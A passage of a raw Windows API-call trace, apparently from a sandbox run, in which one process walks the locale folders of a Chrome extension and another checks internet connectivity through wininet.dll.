SUCCESS | 0x001734c0 | |
| 07:44:29,817 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00pN\x99n\xe0\x91\xcf\x01\xa0\xbb\xcbn\xe0\x91\xcf\x01pN\x99n\xe0\x91\xcf\x01pN\x99n\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00pN\x99n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01\x9a\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:29,817 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:29,817 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:29,897 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\fil\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:29,897 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00pN\x99n\xe0\x91\xcf\x01\xa0\xbb\xcbn\xe0\x91\xcf\x01pN\x99n\xe0\x91\xcf\x01pN\x99n\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00pN\x99n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01\xa0\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:29,897 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:29,897 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:29,978 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\fr\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:29,978 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0\xd5\x9an\xe0\x91\xcf\x01\xa0\xbb\xcbn\xe0\x91\xcf\x01\xd0\\x9cn\xe0\x91\xcf\x01\xd0\\x9cn\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\xd0\\x9cn\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01\xb5\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:29,978 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:29,978 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:30,058 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\hi\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:30,058 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xd0\\x9cn\xe0\x91\xcf\x01\xa0\xbb\xcbn\xe0\x91\xcf\x01\xd0\\x9cn\xe0\x91\xcf\x01\xd0\\x9cn\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\xd0\\x9cn\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01\xa1\x03\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:30,058 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:30,058 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:30,138 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\hr\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:30,138 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x9dn\xe0\x91\xcf\x01\xa0\xbb\xcbn\xe0\x91\xcf\x01\x00\xe4\x9dn\xe0\x91\xcf\x01\x00\xe4\x9dn\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x9dn\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01r\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:30,138 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:30,138 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:30,218 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\hu\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:30,218 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x9dn\xe0\x91\xcf\x01\xa0\xbb\xcbn\xe0\x91\xcf\x010k\x9fn\xe0\x91\xcf\x010k\x9fn\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x000k\x9fn\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01\xa2\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:30,218 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:30,218 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:30,298 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\id\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:30,298 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00`\xf2\xa0n\xe0\x91\xcf\x01\xa0\xbb\xcbn\xe0\x91\xcf\x01`\xf2\xa0n\xe0\x91\xcf\x01`\xf2\xa0n\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00`\xf2\xa0n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01d\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:30,298 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:30,298 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:30,378 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\it\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:30,378 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00`\xf2\xa0n\xe0\x91\xcf\x01\xa0\xbb\xcbn\xe0\x91\xcf\x01`\xf2\xa0n\xe0\x91\xcf\x01`\xf2\xa0n\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00`\xf2\xa0n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01j\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:30,378 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:30,378 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:30,458 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\ja\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:30,458 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00`\xf2\xa0n\xe0\x91\xcf\x01p4\xcan\xe0\x91\xcf\x01\x90y\xa2n\xe0\x91\xcf\x01\x90y\xa2n\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\x90y\xa2n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01\x1a\x03\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:30,458 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:30,458 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:30,508 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:30,508 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:30,508 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:30,508 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:30,508 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:30,538 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\ko\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:30,538 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90y\xa2n\xe0\x91\xcf\x01p4\xcan\xe0\x91\xcf\x01\x90y\xa2n\xe0\x91\xcf\x01\x90y\xa2n\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\x90y\xa2n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01\x98\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:30,538 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:30,538 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:30,769 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\lt\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:30,769 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00 \x0f\xa7n\xe0\x91\xcf\x01p4\xcan\xe0\x91\xcf\x01 \x0f\xa7n\xe0\x91\xcf\x01 \x0f\xa7n\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00 \x0f\xa7n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01\x88\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:30,769 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:30,769 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:30,859 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\lv\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:30,859 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00 \x0f\xa7n\xe0\x91\xcf\x01p4\xcan\xe0\x91\xcf\x01 \x0f\xa7n\xe0\x91\xcf\x01 \x0f\xa7n\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00 \x0f\xa7n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01\x8f\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:30,859 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:30,859 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:30,939 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\nb\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:30,939 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00P\x96\xa8n\xe0\x91\xcf\x01p4\xcan\xe0\x91\xcf\x01P\x96\xa8n\xe0\x91\xcf\x01P\x96\xa8n\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00P\x96\xa8n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01y\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:30,939 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:30,939 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:31,019 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\nl\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:31,019 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00P\x96\xa8n\xe0\x91\xcf\x01p4\xcan\xe0\x91\xcf\x01P\x96\xa8n\xe0\x91\xcf\x01P\x96\xa8n\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00P\x96\xa8n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01v\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:31,019 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:31,019 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:31,099 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\pl\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:31,099 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x80\x1d\xaan\xe0\x91\xcf\x01p4\xcan\xe0\x91\xcf\x01\x80\x1d\xaan\xe0\x91\xcf\x01\x80\x1d\xaan\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\x80\x1d\xaan\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01}\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:31,099 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:31,099 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:31,179 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\pt_BR\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:31,179 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x80\x1d\xaan\xe0\x91\xcf\x01p4\xcan\xe0\x91\xcf\x01\x80\x1d\xaan\xe0\x91\xcf\x01\x80\x1d\xaan\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\x80\x1d\xaan\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01P|\xd9n\xe0\x91\xcf\x01\x99\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 